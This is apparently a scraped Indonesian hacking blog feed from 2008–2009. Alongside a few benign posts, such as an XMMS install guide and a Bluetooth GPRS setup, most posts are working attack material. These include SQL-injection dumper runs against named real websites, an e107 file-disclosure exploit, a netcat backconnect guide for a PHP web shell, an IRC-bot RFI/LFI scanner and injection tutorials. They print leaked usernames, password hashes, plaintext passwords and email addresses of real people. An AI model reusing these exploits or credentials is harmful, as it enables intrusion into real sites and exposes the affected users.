style="font-weight: bold;">Description:<br /><br /></span>MyEnTunnel is a simple system tray application (or NT service) that establishes and maintains TCP SSH tunnels. It does this by launching Plink (PuTTY Link) in the background and then monitors the process.<br /><br /><a href="http://nemesis2.qx.net/pages/MyEnTunnel" target="_blank"><span style="font-weight: bold;">Download</span></a><br /></div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5676546943449335880-2566985345022835212?l=c0li.blogspot.com' alt='' /></div>Andersonnoreply@blogger.com0tag:blogger.com,1999:blog-5676546943449335880.post-25187511701179479242009-09-28T11:25:00.007+07:002009-10-01T00:26:14.379+07:00Simple SQLi Dumper (SSDp) v0.1 GUI<div style="text-align: center;">Saya buat cuman sekedar mengisi kehampaan hati & perasaan (^_*)<br /></div><div style="text-align: center;">Tapi saya juga buat dengan penuh perasaan hehehe...<br /></div><br /><div style="text-align: center;"><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_3_FUVcKXdcE/SsCXT8IWz4I/AAAAAAAAABI/BsF_wCGgG-o/s1600-h/mymagic.jpg"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 298px;" src="http://4.bp.blogspot.com/_3_FUVcKXdcE/SsCXT8IWz4I/AAAAAAAAABI/BsF_wCGgG-o/s400/mymagic.jpg" alt="" id="BLOGGER_PHOTO_ID_5386471523149598594" border="0" /></a><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_3_FUVcKXdcE/SsCXURILVaI/AAAAAAAAABQ/j_-qY-Mnyko/s1600-h/db.jpg"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 298px;" src="http://3.bp.blogspot.com/_3_FUVcKXdcE/SsCXURILVaI/AAAAAAAAABQ/j_-qY-Mnyko/s400/db.jpg" alt="" id="BLOGGER_PHOTO_ID_5386471528785991074" border="0" /></a><br /><span style="font-weight: bold;">Download</span><br />http://luvnova.info/delphi/SSDp-0.1-GUI.zip<br /><br />Hope you enjoy it :)<br /><br /></div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5676546943449335880-2518751170117947924?l=c0li.blogspot.com' alt='' /></div>Andersonnoreply@blogger.com7tag:blogger.com,1999:blog-5676546943449335880.post-9710878198804417542009-09-11T21:06:00.004+07:002010-06-23T20:01:58.952+07:00Check My IP Address PHP Scripts<div style="text-align: center;"><br /><a href="http://seemyip.co.tv" target="_blank"></a><a href="http://c0li.info/tools/cmyip.zip" target="_blank">Source Download</a><br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_3_FUVcKXdcE/SqpbrQOsN9I/AAAAAAAAAA4/VRf9y5BQbAg/s1600-h/cmyip.jpg"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 243px;" src="http://2.bp.blogspot.com/_3_FUVcKXdcE/SqpbrQOsN9I/AAAAAAAAAA4/VRf9y5BQbAg/s400/cmyip.jpg" alt="" id="BLOGGER_PHOTO_ID_5380213503496566738" border="0" /></a><br />Enjoy It :)<br /></div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5676546943449335880-971087819880441754?l=c0li.blogspot.com' alt='' /></div>Andersonnoreply@blogger.com0tag:blogger.com,1999:blog-5676546943449335880.post-68340956207772373372009-09-11T19:43:00.003+07:002009-09-11T20:55:32.551+07:00Simple SQLi Dumper (SSDp) v2.2<div style="text-align: left;"><span style="font-weight: bold;">c0li@locahost:~$ perl ssdp-2.2.txt</span><br /><br />*************************************<br />* Simple SQLi Dumper 2.2 *<br />* Coded By Vrs-hCk *<br />* MainHack.net - AntiSecurity.org *<br />*************************************<br /><br />[SSDp] SQLi URL (c0li inside) : http://linux.uta.edu/article.php?pid=-9999+union+select+0,1,2,c0li,4<br />[SSDp] SQLi End Tag : --<br />[SSDp] Enter DB Name (leave blank for use current db) :<br />[SSDp] Enter Table Name : phpbb_users<br />[SSDp] Enter Columns Name (separate by comma char) : username,user_password<br />[SSDp] Enter ID to Start : 0<br />[SSDp] Enter ID to Stop : 10<br />[SSDp] SQLi Log File : uta.log<br /><br />[SSDp] DUMPING DATA ...<br /><br />[SSDp] [phpbb_users] username,user_password :<br /><br />[SSDp] ID (0) Anonymous:<br />[SSDp] ID (1) bbadmin:f9b790063d5267e9669fbfad57b7a0d5<br />[SSDp] ID (2) jthardy:747dea49eae3d6af9c857d015d9d629e<br />[SSDp] ID (3) digant:9a60dd9fb92185fc06b669d0ae2c427f<br />[SSDp] ID (4) mrpuffypants:113ce43fe4620762d8dd6212aaff6571<br />[SSDp] ID (5) priyavadan:60dc008a962c3c3140410a8a1a6354d6<br />[SSDp] ID (6) manoj:9f44468aa6c33a5a2fd83240b0d1a117<br />[SSDp] ID (7) euphoria:27dc5090ba674bc9d8670ac03625d74d<br />[SSDp] ID (8) JesseD:7b00f80f6139aa5081dd130d15500f59<br />[SSDp] ID (9) kwenda:64c3a57b3f33f6618e7052199b2a48e9<br />[SSDp] ID (10) computerman:67b3dba8bc6778101892eb77249db32e<br /><br />[SSDp] Finish.<br /><br /><span style="font-weight: bold;">[Source] @ http://luvnova.info/xpl/ssdp-2.2.txt</span></div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5676546943449335880-6834095620777237337?l=c0li.blogspot.com' alt='' /></div>Andersonnoreply@blogger.com0tag:blogger.com,1999:blog-5676546943449335880.post-27025962702730533282009-08-14T07:15:00.009+07:002009-10-01T00:05:39.237+07:00VopCrew Multi Scanner 5.1 ReleaseVopCrew Multi Scanner versi 5.1 ini sekaligus sebagai perbaikan dari versi 5.0 yang mana untuk RFI Scanner tidak ada result. Ternyata cuman kekurangan 1 char pada variabel penentu nya -_- xial dah ...<br /><br />Silahkan download di :<br />http://luvnova.info/perl/vopscan5.1.zip<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5676546943449335880-2702596270273053328?l=c0li.blogspot.com' alt='' /></div>Andersonnoreply@blogger.com1tag:blogger.com,1999:blog-5676546943449335880.post-35258641831770756922009-07-27T19:03:00.005+07:002009-11-05T11:39:13.998+07:00Tips Mendapatkan Login SSH/FTP/CpanelAda banyak tools yang sering digunakan untuk mendapatkan login ssh, ftp, atau cpanel.<br />Salah satunya "ConfigSpy", namun untuk menggunakan tool ini anda sudah harus berada dalam system/host target.<br /><br />Mari coba cara lain.<br /><br />Dalam hal ini, saya akan memanfaatkan salah satu Bug LFD (Local File Disclosure) yang di publish oleh teman kita NoGay (NoGe is Gay).<br /><br />http://[site]/[path]/e107_plugins/my_gallery/image.php?file=[LFI]<br /><br />Nah itu Bug nya ...<br /><br />Sebelum menggunakan nya kenali dulu aplikasi web yang digunakan.<br />Maksud saya di sini adalah kita mencari tau dahulu path atau lokasi dimana file config yang mengatur koneksi ke database. Mengapa?? Seperti yang dilakukan oleh "ConfigSpy", yaitu mengambil login database untuk mencoba login ke ftp.<br /><br />Seperti yang kalian tau bahwa sering terjadi kecerobohan dalam memberi login database, dimana login tersebut sama dengan login ke ftp maupun ssh. (cukup deh)<br /><br />Nah ...<br />Pada ada aplikasi cms di atas yaitu e107, path config nya terdapat pada path utama aplikasi dengan nama <b>e107_config.php</b> ...<br /><br />URL dari exploit nya menjadi seperti ini (DEMO):<br /><br />http://ron-jeremy.co.uk/e107_plugins/my_gallery/image.php?file=../../e107_config.php<br /><br />../../ <------- mundur folder sebanyak 2x dari lokasi awal. Content yang kita dapatkan adalah: ........ cut ...................... $mySQLuser = 'brettcater'; $mySQLpassword = 'studio43'; ........ cut ...................... Kalo sudah dapat seperti itu silahkan di coba login ke ftp/ssh :) Kalo gagal berarti login nya tidak sama. Coba terus, tetap semangat -_- Khusus untuk bug cms ini telah saya buat exploit untuk mempermudah dan menghemat tenaga. Silahkan download <a href="http://luvnova.info/xpl/e107.txt" target="_blank">di sini.</a><br /><br />Cara penggunaannya:<br /><br />C:\Perl>perl e107.txt ron-jeremy.co.uk<br /><br />e107 Plugin my_gallery LFD Exploit<br />Found by NoGe - Coded by Vrs-hCk<br /><br />[~] Exploiting http://ron-jeremy.co.uk/ ...<br />[~] DB Username: brettcater<br />[~] DB Password: studio43<br /><br />Tips ini berlaku untuk aplikasi yg memiliki Bug LFI/LFD.<br />Silahkan edit exploit nya sesuai dengan kebutuhan :)<br /><br />Akhir kata ... Sekian.<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5676546943449335880-3525864183177075692?l=c0li.blogspot.com' alt='' /></div>Andersonnoreply@blogger.com2tag:blogger.com,1999:blog-5676546943449335880.post-18706631523011905792009-07-27T18:35:00.003+07:002009-11-05T11:40:32.458+07:00Request by Bram - BackConnect dgn NetCatPersiapan:<br /><br />1. NetCat (Windows/Linux)<br />2. r57 phpshell atau Script backconnect<br /><br />Mulai:<br /><br />1. Jalankan NetCat dengan mengetikan pada command line: ./nc -l -p 9876<br /><br />-l : jalankan netcat dengan mode listening<br />-p : port yang akan dibuka<br /><br />2. Isi "IP" pada backconnect r57 phpshell dengan IP Address dimana anda menjalankan NetCat tadi, isi "Port" dengan Port yang ada buka. Klik Connect!<br /><br />3. Apabila sukses, maka pada command line dimana anda menjalankan NetCat akan terhubung dengan host dimana anda menjalankan script backconnect.<br /><br />c0li@okedeh:~$ ./nc -l -p 9876<br />Linux 168603-1.168603.com 2.6.18-8.el5 #1 SMP Fri Jan 26 14:15:21 EST 2007 i686 i686 i386 GNU/Linux<br />uid=48(apache) gid=48(apache) groups=48(apache),2522(psaserv)<br /><br />Sekian. Thx ...<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5676546943449335880-1870663152301190579?l=c0li.blogspot.com' alt='' /></div>Andersonnoreply@blogger.com1tag:blogger.com,1999:blog-5676546943449335880.post-10863757765859393682009-07-05T16:13:00.004+07:002009-07-27T18:32:10.846+07:00Simple SQLi Dumper v2.0Langsung ajah ...<br /><br />c0li@anzjel:~/xpl$ wget http://luvnova.info/xpl/sqldump2.txt<br />--09:05:09-- http://luvnova.info/xpl/sqldump2.txt<br /> => `sqldump2.txt'<br />Resolving luvnova.info... 66.40.52.72<br />Connecting to luvnova.info|66.40.52.72|:80... connected.<br />HTTP request sent, awaiting response... 200 OK<br />Length: 2,237 (2.2K) [text/plain]<br /><br />100%[=========================================>] 2,237 --.--K/s<br /><br />09:05:09 (1.07 MB/s) - `sqldump2.txt' saved [2237/2237]<br /><br />c0li@anzjel:~/xpl$ perl sqldump2.txt<br /><br /> *************************************<br /> * Simple SQLi Dumper 2.0 *<br /> * By Vrs-hCk *<br /> * c0li.m0de.0n - www.LuvNova.info *<br /> *************************************<br /><br /> [SSDp] Enter SQLi URL (must include c0li string) : http://www.r2racing.nl/nieuws_detail.php?nieuwsID=484+and+1=0+union+select+1,c0li,3,4,5,6,7,8,9<br /> [SSDp] Enter Columns Name (separate by comma char) : UserName,Password,Email<br /> [SSDp] Enter Table Name : users<br /> [SSDp] Enter SQLi End Tag: --<br /><br /> [SSDp] Enter ID to Start : 0<br /> [SSDp] Enter ID to Stop : 651<br /> [SSDp] Enter Filename to Saving Data : r2racing.log<br /><br /> [SSDp] Dumping ...<br /><br /> [SSDp] ID (0) [success]<br /> [SSDp] ID (1) [success]<br /> [SSDp] ID (2) [success]<br /> [SSDp] ID (3) [success]<br /> [SSDp] ID (4) [success]<br /> [SSDp] ID (5) [success]<br /><br />Tunggu aja sampe selese :))<br /><br />c0li@anzjel:~/xpl$ cat r2racing.log<br />Peter:peter:petervdwaal@quicknet.nl<br />Brian:lostcore:brian@R2racing.nl<br />Nighthunter:klieka:Vincent@klieka.nl<br />Remco:gabber:remco@r2racing.nl<br />Annemarie:golfracer:bestgti@hotmail.com<br />....<br />Dan seterus nya ...<br /><br />Note:<br /><br />[SSDp] Enter ID to Stop : 651<br /><br />Gimana cara dapatin nya ???<br /><br />http://www.r2racing.nl/nieuws_detail.php?nieuwsID=484+and+1=0+union+select+1,count(UserName),3,<br />4,5,6,7,8,9+from+users--<br /><br />Mudah kan ^^ ...<br />Sekian ...<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5676546943449335880-1086375776585939368?l=c0li.blogspot.com' alt='' /></div>Andersonnoreply@blogger.com0tag:blogger.com,1999:blog-5676546943449335880.post-72897918556235024722009-04-13T10:07:00.005+07:002010-06-23T20:05:40.060+07:00VopCrew Multi (RFI/SQL/LFI) Scanner 5.0 Final ReleaseFungsi nya untuk mencari web yang ter-infeksi 2 bug yaitu RFI dan LFI. Serta menampilkan juga web yang kemungkinan ter-infeksi SQL Injection dengan cara membaca pesan error dari mysql/mssql.<br />Dalam melakukan tugas nya bot ini dibantu oleh beberapa Search Engine :)<br /><br />Source dapat di download dari :<br /><br /><a href="http://luvnova.info/perl/vopscan5.1.zip" target="_blank">http://luvnova.info/perl/vopscan5.1.zip</a><br /><br />Cara menjalankannya :<br />---------------------------<br /><br /><b>perl vopcrew.txt irc.server.net port botnick ident channel admin fakeproc injector phpshell</b><br /><br />Keterangan :<br /><br />injector = URL dari script Respon nya (script nya sudah satu paket)<br />phpshell = URL dari c99/r57/phpshell milik kamu<br /><br />kalau masih bingung, ini contoh nya :<br /><br />perl vopcrew.txt irc.dal.net 6667 scanner scan MainHack c0li /usr/sbin/httpd http://my.hosting.com/idx http://my.hosting.com/c99<br /><br />Cara menggunakannya ketik !help di channel apabila bot nya sudah join.<br /><br />Sekian ...<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5676546943449335880-7289791855623502472?l=c0li.blogspot.com' alt='' /></div>Andersonnoreply@blogger.com0tag:blogger.com,1999:blog-5676546943449335880.post-48099061124002216082009-04-13T09:54:00.004+07:002009-04-13T10:30:49.260+07:00Apache Conf Scanner v1.0Sesuai dengan namanya, fungsi dari bot ini untuk mencari path/lokasi <b>httpd.conf</b> dengan memanfaatkan bug LFI (Local File Inclusion).<br /><br />Source dapat di download dari :<br /><br /><a href="http://d00r.110mb.com/vopscan/conf-scan.zip" target="_blank">http://d00r.110mb.com/vopscan/conf-scanner.zip</a><br /><br />Cara menjalankannya :<br />---------------------------<br /><br /><b>perl source irc.server.net port botnick ident channel admin fakeproc</b><br /><br />Cara menggunakannya :<br />-----------------------------<br /><br />Ketik <b>!help</b> di channel apabila bot sudah join :)<br /><br />Sekian ...<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5676546943449335880-4809906112400221608?l=c0li.blogspot.com' alt='' /></div>Andersonnoreply@blogger.com0tag:blogger.com,1999:blog-5676546943449335880.post-18970331321097736782009-03-22T09:51:00.001+07:002009-03-23T15:47:59.374+07:00LFI 2 RCE Article Download<span style="font-weight: bold;">http://d00r.110mb.com/LFI%202%20RCE.txt</span><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5676546943449335880-1897033132109773678?l=c0li.blogspot.com' alt='' /></div>Andersonnoreply@blogger.com1tag:blogger.com,1999:blog-5676546943449335880.post-44704438219823139062009-01-16T23:02:00.004+07:002009-03-23T15:47:45.534+07:00Request by NoGe<b>Download aja deh dari sini :D</b><br /><br />Javascript ASCII Converter<br /><a href="http://d00r.110mb.com/scripts/ascii.zip" target="_blank">http://d00r.110mb.com/scripts/ascii.zip</a><br /><br />Base64 Encoder & Decoder<br /><a href="http://d00r.110mb.com/scripts/base64.zip" target="_blank">http://d00r.110mb.com/scripts/base64.zip</a><br /><br />PHP Compressor<br /><a href="http://d00r.110mb.com/scripts/gz.zip" target="_blank">http://d00r.110mb.com/scripts/gz.zip</a><br /><br />Nah segitu dulu ... Cya ^^<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5676546943449335880-4470443821982313906?l=c0li.blogspot.com' alt='' /></div>Andersonnoreply@blogger.com0tag:blogger.com,1999:blog-5676546943449335880.post-66176972827282123302009-01-14T07:57:00.003+07:002009-01-14T08:11:34.802+07:00Tip & Trik MySQL Injection (PHP) Part IIMySQL Version: 5.x.x<br />Trick Title: Mencari Table & Column yang diinginkan<br /><br />Sample:<br />http://www.happypawshaven.org/SALC/index.php?_a=viewProd&productId=20<br /><br />Cek dulu versi MySQL nya ...<br /><br />http://www.happypawshaven.org/SALC/index.php?_a=viewProd&productId=20 union select version()--<br /><br />Hasil:<br />5.0.67-log<br /><br />Contoh kita mau cari kolom yang mengandung login :D<br />Bentuk string untuk di cari tentu saja bisa macam².<br /><br />%pass%<br />%user%<br />%login%<br />%admin%<br /><br />nah string tersebut yg musti di convert ke dalam hex.<br />Contoh:<br /><br />%pass% = 0x257061737325<br /><br />Dengan demikian Query nya menjadi seperti berikut ini:<br /><br />http://www.happypawshaven.org/SALC/index.php?_a=viewProd&productId=20 union select group_concat(table_name,0x3a,column_name) from information_schema.columns where table_schema=database() and column_name like (0x257061737325)--<br /><br />Hasil nya bisa dilihat sendiri:<br /><br />'CubeCart_admin_users:password,CubeCart_customer:password'<br /><br />Yang artinya ada kolom dengan nama "password" di tabel "CubeCart_admin_users" dan juga<br />di tabel "CubeCart_customer".<br /><br />%user% = 0x257573657225<br /><br />http://www.happypawshaven.org/SALC/index.php?_a=viewProd&productId=20 union select group_concat(table_name,0x3a,column_name) from information_schema.columns where table_schema=database() and column_name like (0x257573657225)--<br /><br />Hasil:<br /><br />'CubeCart_SpamBot:userIp,CubeCart_admin_log:user,CubeCart_admin_sessions:username,<br />CubeCart_admin_users:username,CubeCart_blocker:username'<br /><br />Nah sekian dulu. Cya ^^<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5676546943449335880-6617697282728212330?l=c0li.blogspot.com' alt='' /></div>Andersonnoreply@blogger.com0tag:blogger.com,1999:blog-5676546943449335880.post-20432627499303170842008-12-27T04:09:00.001+07:002009-01-14T08:07:10.425+07:00ASP MSSQL Injection VideoomG ...<br /><br /><a href="http://www.4shared.com/file/77691481/45ba41a9/asp-mssql-injection.html" target="_blank">Download Here</a><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5676546943449335880-2043262749930317084?l=c0li.blogspot.com' alt='' /></div>Andersonnoreply@blogger.com2tag:blogger.com,1999:blog-5676546943449335880.post-38322851918373395152008-12-25T16:17:00.000+07:002009-01-14T08:07:19.084+07:00Selamat Hari Raya NatalSaya Vrs-hCk, dan segenap artis ibu kota mengucapkan selamat merayakan Hari Raya Natal. Tuhan Memberkati kita semua :)<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5676546943449335880-3832285191837339515?l=c0li.blogspot.com' alt='' /></div>Andersonnoreply@blogger.com0tag:blogger.com,1999:blog-5676546943449335880.post-30790345589452133622008-12-12T16:40:00.000+07:002008-12-13T02:02:07.493+07:00MaintenanceHuehuehuheuheuue ...<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5676546943449335880-3079034558945213362?l=c0li.blogspot.com' alt='' /></div>Andersonnoreply@blogger.com0tag:blogger.com,1999:blog-5676546943449335880.post-73316758059252834202008-12-12T02:58:00.001+07:002009-12-02T15:20:50.151+07:00MalingSial Hot VideoomG ...<br /><br /><a href="http://www.4shared.com/file/127064244/24bb3a24/malingsial_hot_video.html" target="_blank">Download Here</a><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5676546943449335880-7331675805925283420?l=c0li.blogspot.com' alt='' /></div>Andersonnoreply@blogger.com0tag:blogger.com,1999:blog-5676546943449335880.post-86585684528388824572008-12-09T17:13:00.003+07:002008-12-13T02:03:23.167+07:00Install XMMS di Ubuntu 8.04<span style="font-family: verdana;font-family:verdana;font-size:100%;" >1. sudo apt-get install autotools-dev automake1.9 libtool gettext libasound2-dev libaudiofile-dev \<br />libgl1-mesa-dev libglib1.2-dev libgtk1.2-dev libesd0-dev libice-dev libmikmod2-dev libogg-dev \<br />libsm-dev libvorbis-dev libxxf86vm-dev libxml-dev libssl-dev build-essential make<br /><br />2. Buat file pada directory HOME<br /> mkdir </span><span style="font-family: verdana;font-family:verdana;font-size:100%;" >~/build;cd ~/build<br /><br />3. Download file xmms<br /> </span><span style="font-family: verdana;font-family:verdana;font-size:100%;" >wget http://xmms.org/files/1.2.x/xmms-1.2.11.tar.gz<br /><br />4. Extract file<br /> tar -zxvf xmms-1.2.11.tar.gz<br /><br />5. pidah directory ke </span><span style="font-family: verdana;font-family:verdana;font-size:100%;" > xmms-1.2.11<br /> </span><span style="font-family: verdana;font-family:verdana;font-size:100%;" >cd xmms-1.2.11<br /><br />6. </span><span style="font-family: verdana;font-family:verdana;font-size:100%;" >./configure --prefix=/usr<br /> </span><span style="font-family: verdana;font-family:verdana;font-size:100%;" >make<br /> sudo make install<br /><br />setelah selesai semua proses installasi xmms untuk menjalaknnya tekan alt + F2 dan tulisakn xmms<br /><br />*** By OoN_Boy<br />*** Diselundupkan dari http://oonboy.blogspot.com/<br /></span><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5676546943449335880-8658568452838882457?l=c0li.blogspot.com' alt='' /></div>Andersonnoreply@blogger.com0tag:blogger.com,1999:blog-5676546943449335880.post-82925720245860187752008-12-06T09:09:00.000+07:002008-12-13T02:09:29.003+07:00Blind SQL Injection Part IIKalo sebelumnya kita mencari versi dari MySQL,<br />skrg kita mencoba untuk mencari nama user database nya.<br /><br />ASCII Tables :<br />==============<br />a..z = 97..122<br />A..Z = 65..90<br />0..9 = 48..57<br />@ = 64<br />==============<br /><br />Ok.. yuk maree :))<br /><br />Query : and substring(user(),x,y)=char(n)<br /><br />nah jadi nya begini ...<br /><br />http://localhost/myforum/lecture.php?id=1 and substring(user(),1,1)=char(97)<br /><br />Sebagai langkah awal kita gunakan char(97)<br />yang mana value tersebut bernilai "a".<br />Apabila bernilai false kita naikan lagi sampai<br />dapat nilai true nya. Paham kan :)<br /><br />http://localhost/myforum/lecture.php?id=1 and substring(user(),1,1)=char(114)<br /><br />Sampai di situ saya mendapat nilai true.<br />Yang mana char(114) = "r".<br />Okedeh skrg kita coba char ke 2 dari user().<br /><br />http://localhost/myforum/lecture.php?id=1 and substring(user(),1,2)=char(114,97)<br /><br />Sama hal nya dengan mencari char pertama,<br />kita naikan char ke 2 sampai bernilai true.<br /><br />http://localhost/myforum/lecture.php?id=1 and substring(user(),1,2)=char(114,111)<br /><br />dapat dah nilai true nya yaitu char(111) = "o".<br />jadi udah dapat char(114,111) = "ro"<br />Skrg nyari char ke 3 dst ...<br /><br />http://localhost/myforum/lecture.php?id=1 and substring(user(),1,5)=char(114,111,111,116,64)<br /><br />setelah char ke 5 saya dapatkan ternyata adalah "@",<br />maka bisa dipastikan bahwa value dari user() adalah "root".<br /><br />Mencari nama database sama caranya dengan mencari nama user().<br />Agar lebih mudah gunakan saja Ascii Tables.<br />Ok. Sampai di sini dulu :) Bye² ... mwa mwa ...<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5676546943449335880-8292572024586018775?l=c0li.blogspot.com' alt='' /></div>Andersonnoreply@blogger.com0tag:blogger.com,1999:blog-5676546943449335880.post-63637455297547663492008-12-06T04:56:00.000+07:002008-12-13T02:09:29.004+07:00Blind SQL Injection Part Inah nah ...<br /><br />Blind SQL Injection merupakan ... cari di google gih -_-<br /><br />Kenapa disebut Blind ??<br />Karena jenis serangan ini hanya utk membandingkan nilai dari ke dua value.<br />Yang tentu saja nilai true & false.<br />Dan yang tentu saja itu menurut saya :D<br /><br />Contoh :<br />and 1=1 <----- bernilai true<br />and 1=0 <----- bernilai false<br /><br />Start ... !!!<br /><br />Biar bs langsung dipraktekan saya sarankan utk download aplikasi di bawah ini:<br />MyForum 1.3 - http://www.easy-script.com/scripts-dl/myforumv1.3.zip<br />Install dan mari kita coba ...<br /><br />lanjut ...<br /><br />http://localhost/myforum/lecture.php?id=1 and 1=1<br /><br />nah liad aja tu web na normal² ajah, bandingkan dgn yg ini ...<br /><br />http://localhost/myforum/lecture.php?id=1 and 1=0<br /><br />beda kan ?? nah kalo beda ada kemungkinan bs di injek ... coba deh ... yuk maree ... pertama-tama kita cek dulu versi berapa MySQL nya ...<br /><br />http://localhost/myforum/lecture.php?id=1 and substring(version(),1,1)=4<br />http://localhost/myforum/lecture.php?id=1 and substring(version(),1,1)=5<br /><br />Yang hasil nya "true" berarti itulah versi MySQL nya ... Penjelasan na gini ...<br /><br />substring(teks,x,y)<br /><br />substring digunakan untuk mengambil string dari teks mulai dari x sampai y.<br />nah ... penerapan dalam MySQL bisa dilihat di bawah ini:<br /><br />mysql> select version();<br />+---------------------------------+<br />| version() |<br />+---------------------------------+<br />| 5.2.3-falcon-alpha-community-nt |<br />+---------------------------------+<br />1 row in set (0.00 sec)<br /><br />mysql> select substring(version(),1,1);<br />+--------------------------+<br />| substring(version(),1,1) |<br />+--------------------------+<br />| 5 |<br />+--------------------------+<br />1 row in set (0.00 sec)<br /><br />mysql> select substring(version(),1,10);<br />+---------------------------+<br />| substring(version(),1,10) |<br />+---------------------------+<br />| 5.2.3-falc |<br />+---------------------------+<br />1 row in set (0.00 sec)<br /><br />nah lo ... pasti udah pada ngerti nie :D<br />lanjut lagi ... :)<br /><br />and substring(version(),1,1)=4<br /><br />membandingkan value dari substring(version(),1,1) dan 4<br />apabila hasil nya sama maka akan bernilai "true" :)<br />kalo gak sama yaks "false" wekekekkeke ...<br /><br />Nah sekian dulu ^^ sampe jumpa ... mwa mwa ... muachhhhhhh !!! :D<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5676546943449335880-6363745529754766349?l=c0li.blogspot.com' alt='' /></div>Andersonnoreply@blogger.com1tag:blogger.com,1999:blog-5676546943449335880.post-70633694989701690662008-12-06T04:43:00.000+07:002008-12-13T02:03:23.169+07:00Koneksi GPRS Via Bluetooth di LinuxKoneksi GPRS via Bluetooth di Linux<br />========================<br /><br />Dalam praktek saya menggunakan:<br /><br />- USB Bluetooth<br />- Handphone NOKIA N-Gage QD<br />- Kartu IM3<br />- Distro SuSE Linux 10.1 (i586)<br />- Software bluez (http://bluez.sourceforge.net)<br /><br />bluez dapat di Download dari http://bluez.sf.net<br />* bluez-libs-2.24-10 - Bluetooth Libraries<br />* bluez-utils-2.24-17 - Bluetooth Daemons and Utilities<br /><br />Setelah melakukan peng-install-an, lakukan pengecekan.<br />Caranya:<br /><br />----------------- CONSOLE ------------------<br />root@anderson:~ # dmesg | grep Blue<br />Bluetooth: Core ver 2.8<br />Bluetooth: HCI device and connection manager initialized<br />Bluetooth: HCI socket layer initialized<br />Bluetooth: HCI USB driver ver 2.9<br />Bluetooth: L2CAP ver 2.8<br />Bluetooth: L2CAP socket layer initialized<br />Bluetooth: HIDP (Human Interface Emulation) ver 1.1<br />Bluetooth: RFCOMM socket layer initialized<br />Bluetooth: RFCOMM TTY layer initialized<br />Bluetooth: RFCOMM ver 1.7<br />-------------------- END ---------------------<br /><br />STARTING !!!<br />=========<br /><br />Berubahlah menjadi root sebelum memulai :P<br /><br />1. Deteksi USB Bluetooth<br /><br />----------------- CONSOLE ------------------<br />root@anderson:~ # lsusb<br />... cut ...<br />Bus 005 Device 002: ID 0a12:0001 Cambridge Silicon Radio, Ltd Bluetooth Dongle (HCI mode)<br />... cut ...<br />-------------------- END ---------------------<br /><br />2. Pairing antara Handphone dan Komputer<br /><br />Pertama-tama lakukan pairing antara Handphone yang akan anda gunakan sebagai modem,<br />dengan komputer. Setelah itu masukan PIN yang sama pada Handphone dan komputer.<br /><br />3. Melihat Alamat Bluetooth Handphone<br /><br />Bagi yang menggunakan handphone (NOKIA) bisa dilakukan dengan mengetikan kode *#2820#<br />Selain itu bisa juga dilihat melalui salah satu aplikasi Linux yaitu HCI Tool.<br />Caranya:<br /><br />----------------- CONSOLE ------------------<br />root@anderson:~ # hcitool scan<br />Scanning ...<br /> 00:0E:6D:79:CA:FB N-Gage QD<br />-------------------- END ---------------------<br /><br />4. Melihat Channel Service Dial-up Networking<br /><br />Caranya dengan menggunakan aplikasi SDP tool.<br /><br />----------------- CONSOLE ------------------<br />root@anderson:~ # sdptool search DUN<br />Inquiring ...<br />Searching for DUN on 00:0E:6D:79:CA:FB ...<br />Service Name: Dial-up Networking<br />Service RecHandle: 0x10023<br />Service Class ID List:<br /> "Dialup Networking" (0x1103)<br /> "Generic Networking" (0x1201)<br />Protocol Descriptor List:<br /> "L2CAP" (0x0100)<br /> "RFCOMM" (0x0003)<br /> Channel: 1<br />Language Base Attr List:<br /> code_ISO639: 0x656e<br /> encoding: 0x6a<br /> base_offset: 0x100<br />Profile Descriptor List:<br /> "Dialup Networking" (0x1103)<br /> Version: 0x0100<br />-------------------- END ---------------------<br /><br />5. Mencoba Koneksi ke Handphone<br /><br />Bisa dilakukan dengan mem-ping alamat bluetooth handphone.<br />Caranya:<br /><br />----------------- CONSOLE ------------------<br />root@anderson:~ # l2ping 00:0E:6D:79:CA:FB<br />Ping: 00:0E:6D:79:CA:FB from 00:10:60:D1:01:5A (data size 44) ...<br />0 bytes from 00:0E:6D:79:CA:FB id 0 time 46.54ms<br />0 bytes from 00:0E:6D:79:CA:FB id 1 time 14.88ms<br />0 bytes from 00:0E:6D:79:CA:FB id 2 time 16.18ms<br />0 bytes from 00:0E:6D:79:CA:FB id 3 time 14.18ms<br />0 bytes from 00:0E:6D:79:CA:FB id 4 time 15.27ms<br />5 sent, 5 received, 0% loss<br />-------------------- END ---------------------<br /><br />Tekan CTRL-C untuk menghentikan proses ping.<br /><br 